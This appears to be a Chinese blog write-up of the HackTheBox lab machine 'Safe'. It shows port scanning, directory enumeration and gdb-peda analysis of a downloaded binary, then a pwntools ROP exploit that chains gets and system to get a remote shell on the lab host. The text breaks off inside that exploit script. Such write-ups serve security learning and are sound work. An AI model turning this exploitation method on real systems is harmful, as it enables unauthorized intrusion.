<!DOCTYPE html>
<html lang>
  <head><meta name="generator" content="Hexo 3.9.0"><meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">


<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">

<meta name="theme-color" content="#f8f5ec">
<meta name="msapplication-navbutton-color" content="#f8f5ec">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="#f8f5ec">

<meta name="description" content="HTB safe Writeup"><meta name="keywords" content="sec|secruity|blog"><link rel="alternate" href="/atom.xml" title="danta"><link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=2.11.1">
<link rel="canonical" href="https://cxliker.github.io/2019/12/14/htb-safe-writeup/">

<link rel="stylesheet" type="text/css" href="/lib/fancybox/jquery.fancybox.css"><link rel="stylesheet" type="text/css" href="/lib/nprogress/nprogress.min.css">
<link rel="stylesheet" type="text/css" href="/css/style.css?v=2.11.1">

<script id="baidu_analytics">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?1fb3396bc01d62b8be6fcb651441065c";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script><script id="baidu_push">
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>
<script src="//cdn1.lncld.net/static/js/3.1.1/av-min.js"></script>
  <script id="leancloud">
    AV.init({
      appId: "92CcA9DvqYFSomQnzdApeHt9-gzGzoHsz",
      appKey: "gAPpmDXQmTGE9s9a3eU4nJ0h"
    });
  </script><script>
  window.config = {"leancloud":{"app_id":"92CcA9DvqYFSomQnzdApeHt9-gzGzoHsz","app_key":"gAPpmDXQmTGE9s9a3eU4nJ0h"},"toc":true,"fancybox":true,"pjax":true,"latex":false};
</script>

    <title>HTB safe Writeup - danta</title>
  </head>

  <body><div id="mobile-navbar" class="mobile-navbar">
  <div class="mobile-header-logo">
    <a href="/." class="logo">danta</a>
  </div>
  <div class="mobile-navbar-icon">
    <span></span>
    <span></span>
    <span></span>
  </div>
</div>

<nav id="mobile-menu" class="mobile-menu slideout-menu">
  <ul class="mobile-menu-list"><a href="/archives/">
        <li class="mobile-menu-item">归档
          </li>
      </a><a href="/about">
        <li class="mobile-menu-item">关于
          </li>
      </a><a href="/atom.xml">
        <li class="mobile-menu-item">RSS
          </li>
      </a></ul>
</nav>
<div class="container" id="mobile-panel">
      <header id="header" class="header"><div class="logo-wrapper">
  <a href="/." class="logo">danta</a>
</div>

<nav class="site-navbar"><ul id="menu" class="menu"><li class="menu-item">
          <a class="menu-item-link" href="/archives/">
            归档
            </a>
        </li>
      <li class="menu-item">
          <a class="menu-item-link" href="/about">
            关于
            </a>
        </li>
      <li class="menu-item">
          <a class="menu-item-link" href="/atom.xml">
            RSS
            </a>
        </li>
      </ul></nav>
</header>

      <main id="main" class="main">
        <div class="content-wrapper">
          <div id="content" class="content"><article class="post">
    <header class="post-header">
      <h1 class="post-title">HTB safe Writeup
        </h1>

      <div class="post-meta">
        <span class="author">
          danta
        </span>
        <span class="post-time">
          2019-12-14 19:29
        </span><span class="post-visits" data-url="/2019/12/14/htb-safe-writeup/" data-title="HTB safe Writeup">
          Visits 0
        </span>
        </div>
    </header>

    <div class="post-toc" id="post-toc">
    <h2 class="post-toc-title">文章目录</h2>
    <div class="post-toc-content">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#前言"><span class="toc-text">前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#信息收集"><span class="toc-text">信息收集</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#为什么没扫出来1337端口"><span class="toc-text">为什么没扫出来1337端口</span></a></li></ol></li></ol><li class="toc-item toc-level-1"><a class="toc-link" href="#Web"><span class="toc-text">Web</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#通过栈溢出GetShell"><span class="toc-text">通过栈溢出GetShell</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#确定溢出长度"><span class="toc-text">确定溢出长度</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#选择Gadgets"><span class="toc-text">选择Gadgets</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#提权"><span class="toc-text">提权</span></a></li>
    </div>
  </div><div class="post-content"><h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>这是一篇writeup，靶机是来自hackthebox的<a href="https://www.hackthebox.eu/home/machines/profile/199" target="_blank" rel="noopener">safe</a></p>
<h1 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h1><p>一开始扫全端口，不知道是不是网络问题，怎么都扫不完，后来限制了一下速率：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">kali at ~/htb/safe ❯ nmap -p- --min-rate 10000 -sV -sC -sS 10.10.10.147</span><br><span class="line">Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-14 22:27 EST</span><br><span class="line">Nmap scan report <span class="keyword">for</span> 10.10.10.147</span><br><span class="line">Host is up (7.6s latency).</span><br><span class="line">Not shown: 61065 filtered ports, 4468 closed ports</span><br><span class="line">PORT   STATE SERVICE VERSION</span><br><span class="line">22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)</span><br><span class="line">| ssh-hostkey:</span><br><span class="line">|   2048 6d:7c:81:3d:6a:3d:f9:5f:2e:1f:6a:97:e5:00:ba:de (RSA)</span><br><span class="line">|   256 99:7e:1e:22:76:72:da:3c:c9:61:7d:74:d7:80:33:d2 (ECDSA)</span><br><span class="line">|_  256 6a:6b:c3:8e:4b:28:f7:60:85:b1:62:ff:54:bc:d8:d6 (ED25519)</span><br><span class="line">80/tcp open  http    Apache httpd 2.4.25 ((Debian))</span><br><span class="line">|_http-server-header: Apache/2.4.25 (Debian)</span><br><span class="line">|_http-title: Apache2 Debian Default Page: It works</span><br><span class="line">Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</span><br></pre></td></tr></table></figure>

<p>只有22端口和80端口，看来只能从Web入手了，大便系统上搭的apache</p>
<h3 id="为什么没扫出来1337端口"><a href="#为什么没扫出来1337端口" class="headerlink" title="为什么没扫出来1337端口"></a>为什么没扫出来1337端口</h3><p>在后续的发现中是还有一个1337端口是开放的，后面看别人的Writeup也有部分Writeup是可以扫出来1337端口的，为啥我这里没有扫出来呢？原因在于应使用<code>-PN</code>参数：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">kali at ~/htb/safe ❯ nmap -Pn -p1337 10.10.10.147</span><br><span class="line">Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-14 23:01 EST</span><br><span class="line">Nmap scan report <span class="keyword">for</span> 10.10.10.147</span><br><span class="line">Host is up (0.45s latency).</span><br><span class="line"></span><br><span class="line">PORT     STATE SERVICE</span><br><span class="line">1337/tcp open  waste</span><br><span class="line"></span><br><span class="line">Nmap <span class="keyword">done</span>: 1 IP address (1 host up) scanned <span class="keyword">in</span> 0.67 seconds</span><br><span class="line">kali at ~/htb/safe ❯ nmap -p1337 10.10.10.147</span><br><span class="line">Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-14 23:01 EST</span><br><span class="line">Nmap scan report <span class="keyword">for</span> 10.10.10.147</span><br><span class="line">Host is up (0.00029s latency).</span><br><span class="line"></span><br><span class="line">PORT     STATE    SERVICE</span><br><span class="line">1337/tcp filtered waste</span><br><span class="line"></span><br><span class="line">Nmap <span class="keyword">done</span>: 1 IP address (1 host up) scanned <span class="keyword">in</span> 0.69 seconds</span><br></pre></td></tr></table></figure>

<p>默认下nmap是会先探测主机是否存活，使用<code>-Pn</code>会跳过主机探测的步骤（也就是不Ping）。但是这里有点疑惑的这个IP本身就是可以Ping的，所以理论上跳不跳过主机探测不都是一样的吗？为什么用不用<code>-Pn</code>参数的效果不一样呢？</p>
<h1 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h1><p>打开只有一个大便Apache的默认页面：</p>
<p><img src="/image/6.jpg" alt></p>
<p>看到这个页面就觉得应该是要扫一下目录：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line">⇒  python dirsearch.py -u http://10.10.10.147 -e *</span><br><span class="line"></span><br><span class="line"> _|. _ _  _  _  _ _|_    v0.3.8</span><br><span class="line">(_||| _) (/_(_|| (_| )</span><br><span class="line"></span><br><span class="line">Extensions: CHANGELOG.md | HTTP method: get | Threads: 10 | Wordlist size: 6103</span><br><span class="line"></span><br><span class="line">Error Log: /Users/danta/Code/dirsearch/logs/errors-19-12-14_19-09-19.log</span><br><span class="line"></span><br><span class="line">Target: http://10.10.10.147</span><br><span class="line"></span><br><span class="line">[19:09:20] Starting:</span><br><span class="line">[19:09:33] 403 -  291B  - /.hta</span><br><span class="line">[19:09:33] 403 -  300B  - /.htaccess.BAK</span><br><span class="line">[19:09:33] 403 -  301B  - /.htaccess.bak1</span><br><span class="line">[19:09:33] 403 -  302B  - /.htaccess-marco</span><br><span class="line">[19:09:33] 403 -  300B  - /.htaccess-dev</span><br><span class="line">[19:09:33] 403 -  302B  - /.htaccess-local</span><br><span class="line">[19:09:33] 403 -  298B  - /.ht_wsr.txt</span><br><span class="line">[19:09:33] 403 -  300B  - /.htaccess.old</span><br><span class="line">[19:09:33] 403 -  301B  - /.htaccess.orig</span><br><span class="line">[19:09:33] 403 -  301B  - /.htaccess.save</span><br><span class="line">[19:09:33] 403 -  303B  - /.htaccess.sample</span><br><span class="line">[19:09:33] 403 -  300B  - /.htaccess.txt</span><br><span class="line">[19:09:33] 403 -  299B  - /.htaccess_sc</span><br><span class="line">[19:09:33] 403 -  299B  - /.htaccessBAK</span><br><span class="line">[19:09:33] 403 -  302B  - /.htaccess_extra</span><br><span class="line">[19:09:33] 403 -  301B  - /.htaccess_orig</span><br><span class="line">[19:09:34] 403 -  300B  - /.htaccessOLD2</span><br><span class="line">[19:09:34] 403 -  295B  - /.htgroup</span><br><span class="line">[19:09:34] 403 -  297B  - /.htaccess~</span><br><span class="line">[19:09:34] 403 -  299B  - /.htaccessOLD</span><br><span class="line">[19:09:34] 403 -  300B  - /.htpasswd-old</span><br><span class="line">[19:09:34] 403 -  301B  - /.htpasswd_test</span><br><span class="line">[19:09:35] 403 -  297B  - /.htpasswds</span><br><span class="line">[19:09:35] 403 -  295B  - /.htusers</span><br><span class="line">[19:12:31] 200 -   11KB - /index.html</span><br><span class="line">[19:12:56] 301 -  313B  - /manual  -&gt;  http://10.10.10.147/manual/</span><br><span class="line">[19:12:56] 200 -  626B  - /manual/index.html</span><br><span class="line">[19:13:53] 403 -  300B  - /server-status</span><br><span class="line">[19:13:53] 403 -  301B  - /server-status/</span><br><span class="line"></span><br><span class="line">Task Completed</span><br></pre></td></tr></table></figure>

<p>打开<code>/manual</code>看看，发现是apache的文档页面，又是默认页面。后来又换了一些字典，发现还是相同的结果。想来想去也没有别的入口的，后来看看别人的writeup才发现原来还可以这样。。。</p>
<p>查看首页的源码：</p>
<p><img src="/image/8.jpg" alt></p>
<p>里面说还有个1337端口，而且这个程序还可以通过访问路径<code>myapp</code>下载。我是真没想到还可以修改默认页面，看来真是每个细节都不能放过。。</p>
<p>下载myapp后查看是个可执行文件，执行一下看看，然后再看看1337端口</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">kali at ~/htb/safe ❯ file myapp</span><br><span class="line">myapp: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, <span class="keyword">for</span> GNU/Linux 3.2.0, BuildID[sha1]=fcbd5450d23673e92c8b716200762ca7d282c73a, not stripped</span><br><span class="line">kali at ~/htb/safe ❯ chmod u+x myapp</span><br><span class="line">kali at ~/htb/safe ❯ ./myapp</span><br><span class="line"> 00:23:04 up 1 day, 23:52,  3 users,  load average: 0.00, 0.00, 0.00</span><br><span class="line"></span><br><span class="line">What <span class="keyword">do</span> you want me to <span class="built_in">echo</span> back? ls</span><br><span class="line">ls</span><br><span class="line">kali at ~/htb/safe ❯ nc 10.10.10.147 1337</span><br><span class="line"> 00:26:35 up 18:21,  0 users,  load average: 0.00, 0.00, 0.00</span><br><span class="line">ls</span><br><span class="line"></span><br><span class="line">What <span class="keyword">do</span> you want me to <span class="built_in">echo</span> back? ls</span><br></pre></td></tr></table></figure>

<p>到这一步后我有点意外…这不就是一道pwn题吗….</p>
<h1 id="通过栈溢出GetShell"><a href="#通过栈溢出GetShell" class="headerlink" title="通过栈溢出GetShell"></a>通过栈溢出GetShell</h1><p>到现在我们知道1337端口的程序就是<code>myapp</code>，就目前所知的是这个程序会输出我们输入的东西。看起来就是一个栈溢出的题目。</p>
<p>使用checksec查看表示开启了NX，但是没有其他的保护了。栈溢出的利用方式大概有4种（<a href="https://paper.seebug.org/271/" target="_blank" rel="noopener">手把手教你栈溢出从入门到放弃（上）</a>，<a href="https://paper.seebug.org/272/" target="_blank" rel="noopener">手把手教你栈溢出从入门到放弃（下）</a>）。NX开启了意味着栈上不能执行shellcode，这儿又不知道所用的动态库的版本，没办法用return2libc方法。所以只能用rop的方式。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">root@kali:htb/safe <span class="comment"># gdb -q myapp</span></span><br><span class="line">Reading symbols from myapp...</span><br><span class="line">(No debugging symbols found <span class="keyword">in</span> myapp)</span><br><span class="line">gdb-peda$ checksec</span><br><span class="line">CANARY    : disabled</span><br><span class="line">FORTIFY   : disabled</span><br><span class="line">NX        : ENABLED</span><br><span class="line">PIE       : disabled</span><br><span class="line">RELRO     : Partial</span><br></pre></td></tr></table></figure>

<p>要利用ROP来getshell，我们需要确定两件事：一个是溢出数据的长度，另一个是<code>gadget</code>（某段指令）的地址。</p>
<h2 id="确定溢出长度"><a href="#确定溢出长度" class="headerlink" title="确定溢出长度"></a>确定溢出长度</h2><p>给<code>gdb</code>装上 <a href="https://github.com/longld/peda" target="_blank" rel="noopener">Peda</a> 插件，可以很简单即可确定溢出长度。这里需要注意的是，gdb在调试多进程的时候，默认会只调试主进程，而peda是会继续跟踪子进程（<a href="https://www.ibm.com/developerworks/cn/linux/l-cn-gdbmp/index.html" target="_blank" rel="noopener">相关</a>）。在这个程序中，因为多进程的原因导致程序直接退出了，所以先设置了一下<code>set follow-fork-mode parent</code>来保证peda只调试主进程。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br></pre></td><td class="code"><pre><span class="line">root@kali:htb/safe <span class="comment"># gdb -q myapp</span></span><br><span class="line">Reading symbols from myapp...</span><br><span class="line">(No debugging symbols found <span class="keyword">in</span> myapp)</span><br><span class="line">gdb-peda$ <span class="built_in">set</span> follow-fork-mode parent</span><br><span class="line">gdb-peda$ pattern_create 200</span><br><span class="line"><span class="string">'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA'</span></span><br><span class="line">gdb-peda$ r</span><br><span class="line">Starting program: /root/htb/safe/myapp</span><br><span class="line">[Detaching after vfork from child process 79586]</span><br><span class="line"> 03:15:51 up 2 days,  2:44,  3 users,  load average: 0.00, 0.00, 0.00</span><br><span class="line"></span><br><span class="line">What <span class="keyword">do</span> you want me to <span class="built_in">echo</span> back? AAA%AAsAABAA<span class="variable">$AAnAACAA</span>-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA</span><br><span class="line">AAA%AAsAABAA<span class="variable">$AAnAACAA</span>-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA</span><br><span class="line"></span><br><span class="line">Program received signal SIGSEGV, Segmentation fault.</span><br><span class="line">[----------------------------------registers-----------------------------------]</span><br><span class="line">RAX: 0x0</span><br><span class="line">RBX: 0x0</span><br><span class="line">RCX: 0x7ffff7ee0904 (&lt;__GI___libc_write+20&gt;:	cmp    rax,0xfffffffffffff000)</span><br><span class="line">RDX: 0x7ffff7fb1580 --&gt; 0x0</span><br><span class="line">RSI: 0x405260 (<span class="string">"AAA%AAsAABAA<span class="variable">$AAnAACAA</span>-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA"</span>...)</span><br><span class="line">RDI: 0x0</span><br><span class="line">RBP: 0x41414e4141384141 (<span class="string">'AA8AANAA'</span>)</span><br><span class="line">RSP: 0x7fffffffe348 (<span class="string">"jAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA"</span>)</span><br><span class="line">RIP: 0x4011ac (&lt;main+77&gt;:	ret)</span><br><span class="line">R8 : 0xc9</span><br><span class="line">R9 : 0x0</span><br><span class="line">R10: 0x4003e0 --&gt; 0x6972700073747570 (<span class="string">'puts'</span>)</span><br><span class="line">R11: 0x246</span><br><span class="line">R12: 0x401070 (&lt;_start&gt;:	xor    ebp,ebp)</span><br><span class="line">R13: 0x7fffffffe420 --&gt; 0x1</span><br><span class="line">R14: 0x0</span><br><span class="line">R15: 0x0</span><br><span class="line">EFLAGS: 0x10246 (carry PARITY adjust ZERO sign <span class="built_in">trap</span> INTERRUPT direction overflow)</span><br><span class="line">[-------------------------------------code-------------------------------------]</span><br><span class="line">   0x4011a1 &lt;main+66&gt;:	call   0x401030 &lt;puts@plt&gt;</span><br><span class="line">   0x4011a6 &lt;main+71&gt;:	mov    eax,0x0</span><br><span class="line">   0x4011ab &lt;main+76&gt;:	leave</span><br><span class="line">=&gt; 0x4011ac &lt;main+77&gt;:	ret</span><br><span class="line">   0x4011ad:	nop    DWORD PTR [rax]</span><br><span class="line">   0x4011b0 &lt;__libc_csu_init&gt;:	push   r15</span><br><span class="line">   0x4011b2 &lt;__libc_csu_init+2&gt;:	mov    r15,rdx</span><br><span class="line">   0x4011b5 &lt;__libc_csu_init+5&gt;:	push   r14</span><br><span class="line">[------------------------------------stack-------------------------------------]</span><br><span class="line">0000| 0x7fffffffe348 (<span class="string">"jAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA"</span>)</span><br><span class="line">0008| 0x7fffffffe350 (<span class="string">"AkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA"</span>)</span><br><span class="line">0016| 0x7fffffffe358 (<span class="string">"AAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA"</span>)</span><br><span class="line">0024| 0x7fffffffe360 (<span class="string">"RAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA"</span>)</span><br><span class="line">0032| 0x7fffffffe368 (<span class="string">"ApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA"</span>)</span><br><span class="line">0040| 0x7fffffffe370 (<span class="string">"AAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA"</span>)</span><br><span class="line">0048| 0x7fffffffe378 (<span class="string">"VAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA"</span>)</span><br><span class="line">0056| 0x7fffffffe380 (<span class="string">"AuAAXAAvAAYAAwAAZAAxAAyA"</span>)</span><br><span class="line">[------------------------------------------------------------------------------]</span><br><span class="line">Legend: code, data, rodata, value</span><br><span class="line">Stopped reason: SIGSEGV</span><br><span class="line">0x00000000004011ac <span class="keyword">in</span> main ()</span><br></pre></td></tr></table></figure>

<p>可以看到输入了200个长度的字符串后引起了程序的报错（因为程序的返回地址被刚输入的字符串覆盖了，一个错误的地址导致了异常退出，这个错误的地址就是栈顶的值。），这时候我们取到栈顶的值来计算溢出长度。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">gdb-peda$ pattern_offset jAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA</span><br><span class="line">jAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA found at offset: 120</span><br><span class="line">gdb-peda$ pattern_create</span><br></pre></td></tr></table></figure>

<p>得到溢出长度120。</p>
<h2 id="选择Gadgets"><a href="#选择Gadgets" class="headerlink" title="选择Gadgets"></a>选择Gadgets</h2><p>最终的目的是要获取shell，所以需要执行类似<code>system(&quot;/bin/sh&quot;)</code>的方法来获得一个shell，因为可以通过栈溢出控制程序执行流程，那么我就还需要两个东西：一个是system函数的地址，一个是”/bin/sh”字符串的地址。</p>
<p>先看一下程序本身有什么函数可以用：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">gdb-peda$ info <span class="built_in">functions</span></span><br><span class="line">All defined <span class="built_in">functions</span>:</span><br><span class="line"></span><br><span class="line">Non-debugging symbols:</span><br><span class="line">0x0000000000401000  _init</span><br><span class="line">0x0000000000401030  puts@plt</span><br><span class="line">0x0000000000401040  system@plt</span><br><span class="line">0x0000000000401050  <span class="built_in">printf</span>@plt</span><br><span class="line">0x0000000000401060  gets@plt</span><br><span class="line">0x0000000000401070  _start</span><br><span class="line">0x00000000004010a0  _dl_relocate_static_pie</span><br><span class="line">0x00000000004010b0  deregister_tm_clones</span><br><span class="line">0x00000000004010e0  register_tm_clones</span><br><span class="line">0x0000000000401120  __do_global_dtors_aux</span><br><span class="line">0x0000000000401150  frame_dummy</span><br><span class="line">0x0000000000401152  <span class="built_in">test</span></span><br><span class="line">0x000000000040115f  main</span><br><span class="line">0x00000000004011b0  __libc_csu_init</span><br><span class="line">0x0000000000401210  __libc_csu_fini</span><br><span class="line">0x0000000000401214  _fini</span><br></pre></td></tr></table></figure>

<p>有<code>system</code>，<code>gets</code>方法，所以可以调用通过gets方法读取<code>/bin/sh</code>，然后通过system调用。</p>
<p>通过使用ida反编译的时候可以看到程序的<code>.data</code>段是可写的，并且获取到地址为<code>0x404038h</code>。所以我们可以通过调用<code>gets</code>函数将<code>/bin/sh</code>写入到<code>0x404038h</code>中，然用调用<code>system(0x404038h)</code>即可。另外我们还需要一个跳转到<code>gets</code>函数的gadgets。</p>
<p>使用<a href="https://github.com/JonathanSalwan/ROPgadget" target="_blank" rel="noopener">ROPgadget</a>可以很方便地找到这个Gadgets：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">root@kali:htb/safe <span class="comment"># ROPgadget --binary myapp --only "pop|ret" | grep rdi</span></span><br><span class="line">0x000000000040120b : pop rdi ; ret</span><br></pre></td></tr></table></figure>

<p>按照这个思路写的exp：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context(os=<span class="string">"linux"</span>, arch=<span class="string">"amd64"</span>)</span><br><span class="line"><span class="comment">#context(log_level='DEBUG')</span></span><br><span class="line"></span><br><span class="line">junk = <span class="string">"A"</span>*<span class="number">120</span></span><br><span class="line"></span><br><span class="line">plt_gets = p64(<span class="number">0x401060</span>)</span><br><span class="line">plt_system = p64(<span class="number">0x401040</span>)</span><br><span class="line">pop_rdi = p64(<span class="number">0x40120b</span>)</span><br><span class="line">binsh = p64(<span class="number">0x404038</span>)</span><br><span class="line"></span><br><span class="line">payload = junk + pop_rdi + binsh + plt_gets + pop_rdi + binsh + plt_system</span><br><span class="line"></span><br><span class="line">p = remote(<span class="string">"10.10.10.147"</span>, <span class="number">1337</span>)</span><br><span class="line">p.recvline()</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.sendline(<span class="string">'/bin/sh\x00'</span>)</span><br><span 